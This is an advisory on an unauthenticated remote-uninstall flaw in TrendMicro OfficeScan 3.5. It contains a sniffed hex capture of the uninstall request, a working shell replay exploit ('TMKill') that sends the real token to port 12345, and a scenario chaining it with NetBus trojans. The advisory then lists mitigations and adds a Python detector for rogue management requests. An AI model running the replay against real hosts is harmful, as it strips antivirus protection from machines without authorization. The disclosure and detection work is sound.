COMMAND
OfficeScan
SYSTEMS AFFECTED
TrendMicro OfficeScan 3.5
PROBLEM
Gregory Duchemin found the following. He tried something new with
the anti-virus agent listening on port 12345. First, he sniffed an
admin request from the web-based centralized server toward the
target. This request uses the HTTP/1.0 protocol, so it is in
human-readable form. This is an example of such a request, captured
with the help of the very cool buttsniffer (BO plug-in):
Source IP: x.x.x.x Target IP: x.x.x.x
TCP Length: 533 Source Port: 1241 Target Port: 12345 Seq: 00815779 Ack: 01263158
Flags: PA Window: 8760 TCP ChkSum: 7159 UrgPtr: 0
00000000: 47 45 54 20 2F 3F 30 35 36 38 30 46 35 34 35 45  GET /?05680F545E
00000010: 38 38 41 45 44 35 33 39 32 42 38 38 35 45 45 37  88AED5392B885EE7
00000020: 31 34 32 44 38 42 42 46 38 45 33 35 32 36 39 33  142D8BBF8E352693
00000030: 37 32 35 34 33 30 44 43 31 45 37 46 39 35 34 46  725430DC1E7F954F
00000040: 42 33 34 35 46 45 38 39 39 46 30 31 32 30 33 42  B345FE899F01203B
00000050: 32 32 32 43 46 41 46 38 42 30 35 43 41 35 44 39  222CFAF8B05CA5D9
00000060: 30 43 46 35 44 45 45 37 33 38 31 30 32 41 42 31  0CF5DEE738102AB1
00000070: 43 41 45 45 45 36 32 46 37 46 34 41 41 33 36 45  CAEEE62F7F4AA36E
00000080: 43 44 32 30 43 42 35 45 41 44 45 43 32 43 35 34  CD20CB5EADEC2C54
00000090: 37 37 36 36 35 30 44 35 35 35 41 39 34 31 35 42  776650D555A9415B
000000A0: 45 35 33 34 38 45 37 46 30 30 46 39 38 31 41 35  E5348E7F00F981A5
000000B0: 44 42 45 45 31 46 33 41 42 33 30 46 41 42 43 34  DBEE1F3AB30FABC4
000000C0: 33 33 32 33 30 46 36 36 42 34 39 39 38 32 46 44  33230F66B49982FD
000000D0: 41 35 46 30 37 37 44 30 37 41 46 37 32 31 43 44  A5F077D07AF721CD
000000E0: 37 39 31 38 41 35 35 38 30 43 33 33 31 42 43 34  7918A5580C331BC4
000000F0: 43 32 41 39 35 39 42 46 36 33 34 31 31 32 42 34  C2A959BF634112B4
00000100: 46 39 41 39 33 39 35 33 42 38 46 36 34 42 30 32  F9A93953B8F64B02
00000110: 43 38 38 31 45 44 36 43 35 35 42 46 43 44 36 32  C881ED6C55BFCD62
00000120: 30 35 36 31 33 34 42 42 46 38 30 30 37 45 46 46  056134BBF8007EFF
00000130: 42 36 36 34 33 35 31 38 31 41 37 37 36 32 45 45  B66435181A7762EE
00000140: 30 32 42 38 39 31 33 46 35 34 35 44 32 35 31 31  02B8913F545D2511
00000150: 38 39 37 43 38 39 38 46 33 45 35 33 42 42 38 44  897C898F3E53BB8D
00000160: 34 46 34 45 43 37 31 45 37 46 41 43 36 44 38 45  4F4EC71E7FAC6D8E
00000170: 32 36 44 33 45 35 35 41 39 41 37 43 31 45 42 39  26D3E55A9A7C1EB9
00000180: 36 42 44 46 44 32 42 45 38 34 34 46 43 35 45 43  6BDFD2BE844FC5EC
00000190: 36 35 44 41 46 36 43 37 31 43 30 32 39 34 32 41  65DAF6C71C02942A
000001A0: 39 32 42 42 39 37 38 41 43 38 37 35 31 32 30 32  92BB978AC8751202
000001B0: 43 35 30 45 45 34 30 34 34 35 44 44 36 43 44 31  C50EE40445DD6CD1
000001C0: 31 43 45 31 31 41 39 39 30 34 20 48 54 54 50 2F  1CE11A9904 HTTP/
000001D0: 31 2E 30 0D 0A 48 6F 73 74 3A 20 31 30 2E 31 2E  1.0..Host: x.x.x.x
000001E0: 36 2E 39 34 3A 31 32 33 34 35 0D 0A 55 73 65 72  :12345..User
000001F0: 2D 41 67 65 6E 74 3A 20 4F 66 66 69 63 65 53 63  -Agent: OfficeSc
00000200: 61 6E 2F 33 2E 35 0D 0A 41 63 63 65 70 74 3A 20  an/3.5..Accept:
00000210: 2A 2F 2A 0D 0A                                   */*..
Note the very long ASCII string following the default HTML document
path ("/?"). In this case this string means: "remote un-installation
of the TrendMicro product"! So Gregory replayed the same request
toward another client, with success. A few seconds later, that
workstation no longer had OfficeScan installed on it: the product had
been removed from the hard disk of the target system.
That attack was conducted against OfficeScan 3.5 on Windows NT 4.0
SP5. Since the problem lies in the protocol layer, not in the
operating system involved, other systems such as Windows 9.x and
Windows 3.x should be affected too.
So, a malicious user is able to remotely remove every OfficeScan
agent inside the company network (effectively stealing the admin
privilege) without any authentication, because this authentication
is only used to launch the manager, not to sign or encrypt the
packets. Because the manager is used for other administration tasks
as well, it may be possible to upload a zero-length signature file,
for example. A dark scenario may be this one, in five steps:
1- the malicious user injects a bad signature file to all the PCs
2- then he sends his trojanned mail (with a netbus attached) to
every user
3- after a good time drinking his cola, he starts the netbus
client and looks for all the possibly infected stations
4- because 12345 is the netbus port too, admins would not
immediately understand that they are under attack
5- the attacker starts his bad job
Gregory wrote a little exploit too:
#!/bin/sh
#
# Usage: TMKill target_ip
# gdn@neurocom.com ( Gregory Duchemin )
#
# Replays the sniffed management request (the hex command token from
# the capture above) to the OfficeScan agent listening on port 12345
# of the target. The subshell writes the HTTP/1.0 request, header by
# header, to telnet's standard input; the sleeps give the connection
# time to open and the agent time to answer before telnet exits.
(
sleep 2
echo "GET /?05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E7F954FB345FE899F01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C54776650D555A9415BE5348E7F00F981A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721CD7918A5580C331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD62056134BBF8007EFFB66435181A7762EE02B8913F545D2511897C898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A9A7C1EB96BDFD2BE844FC5EC65DAF6C71C02942A92BB978AC8751202C50EE40445DD6CD11CE11A9904 HTTP/1.0"
echo "Host: $1:12345"
echo "User-Agent: OfficeScan/3.5"
echo "Accept: */*"
echo
sleep 10
) | telnet "$1" 12345 2>&1 | tee -a ./log.txt
SOLUTION
Solutions:
1- contact TrendMicro
2- close port 12345 on all the stations: stop the TMlisten service
in the Services menu (NT); no more network upgrades until
TrendMicro gives us a patch
3- install sniffers all over the network to track possible
attackers
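Solution step 3 (sniffers on the network) follows directly from the weakness described in the PROBLEM section: management requests to port 12345 are plain HTTP/1.0 with no signature or encryption, so the only thing that distinguishes a replayed command from a real one is where it comes from. The Python below is an added example, not code from the advisory, from Gregory Duchemin or from TrendMicro. It parses the payload of a TCP segment sent to port 12345 as an OfficeScan-style request (GET /?<hex token> HTTP/1.0 followed by headers, as in the capture above) and raises an alert whenever such a request carries the OfficeScan User-Agent but originates from a host that is not a known management server. The management server address, the sample segments and the hex token inside them are constructed placeholders; the token is not the real uninstall command from the capture.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Port on which the OfficeScan 3.5 agent (TMlisten) accepts management
# requests, as described in the advisory.
OFFICESCAN_PORT = 12345

# Hosts allowed to send management commands to the agents.
# Assumption for this example: a site fills this with the address(es)
# of its real OfficeScan management server.
ALLOWED_MANAGERS = {"10.0.0.5"}

# Request line of a management command: GET /?<hex command token> HTTP/1.0
# The protocol is plain HTTP/1.0, so a bare LF line ending is accepted
# as well as CRLF (the replay script in the advisory sends bare LF).
REQUEST_LINE = re.compile(rb"^GET /\?([0-9A-Fa-f]+) HTTP/1\.[01]\r?\n")


@dataclass
class Alert:
    src_ip: str
    dst_ip: str
    user_agent: str
    token_len: int   # length of the hex command token, in characters

    def __str__(self) -> str:
        return (f"ALERT OfficeScan command to {self.dst_ip}:{OFFICESCAN_PORT} "
                f"from non-manager host {self.src_ip} "
                f"(User-Agent {self.user_agent}, {self.token_len}-char token)")


def parse_request(payload: bytes) -> Optional[dict]:
    """Split a TCP payload into the hex command token and the HTTP headers.

    Returns None when the payload is not a request of the form seen in the
    capture (for example other binary traffic that happens to use port 12345).
    """
    m = REQUEST_LINE.match(payload)
    if m is None:
        return None
    headers = {}
    for raw in payload[m.end():].split(b"\n"):
        line = raw.rstrip(b"\r")
        if not line:            # blank line ends the header block
            break
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().decode("ascii", "replace").lower()] = \
                value.strip().decode("ascii", "replace")
    return {"token": m.group(1).decode("ascii"), "headers": headers}


def inspect_segment(src_ip: str, dst_ip: str, dst_port: int, payload: bytes,
                    allowed=ALLOWED_MANAGERS) -> Optional[Alert]:
    """Return an Alert if the segment carries an OfficeScan management
    command that did not originate from a known management server."""
    if dst_port != OFFICESCAN_PORT:
        return None
    req = parse_request(payload)
    if req is None:
        return None
    ua = req["headers"].get("user-agent", "")
    if not ua.startswith("OfficeScan/"):
        return None
    if src_ip in allowed:
        return None         # legitimate manager: nothing to report
    return Alert(src_ip, dst_ip, ua, len(req["token"]))


# Constructed sample traffic. The token is a placeholder of the same
# shape as the captured one (hex digits), not the real uninstall command.
FAKE_TOKEN = ("0123456789ABCDEF" * 4).encode()   # 64 hex characters


def build_request(host: str, crlf: bool = True) -> bytes:
    """Build a management request in the format shown in the capture."""
    eol = b"\r\n" if crlf else b"\n"
    return (b"GET /?" + FAKE_TOKEN + b" HTTP/1.0" + eol
            + b"Host: " + host.encode() + b":12345" + eol
            + b"User-Agent: OfficeScan/3.5" + eol
            + b"Accept: */*" + eol + eol)


# (src_ip, dst_ip, dst_port, payload); every entry is constructed
SAMPLE_SEGMENTS = [
    ("10.0.0.5",  "10.0.0.20", 12345, build_request("10.0.0.20")),         # real manager
    ("10.0.0.99", "10.0.0.20", 12345, build_request("10.0.0.20", False)),  # rogue host, LF only
    ("10.0.0.99", "10.0.0.21", 12345, b"\x00\x01\x02 not http at all"),    # unrelated traffic
    ("10.0.0.99", "10.0.0.20", 80,    build_request("10.0.0.20")),         # wrong port
]


def run_samples(segments=SAMPLE_SEGMENTS) -> list:
    """Inspect every sample segment and return the alerts raised."""
    alerts = []
    for src, dst, port, payload in segments:
        alert = inspect_segment(src, dst, port, payload)
        if alert is not None:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in run_samples():
        print(a)
```

Only the second sample raises an alert: it is a well-formed OfficeScan request, but from an address outside ALLOWED_MANAGERS. The same three conditions (destination port 12345, an HTTP request line with a hex token, a User-Agent beginning with OfficeScan/) can be turned into a capture filter for whatever sniffer is deployed under solution step 2 and 3, with the source-address check done afterwards against the list of real management servers. Because the agent accepts the command from anyone, the source check is the whole detection; the token itself carries no proof of origin.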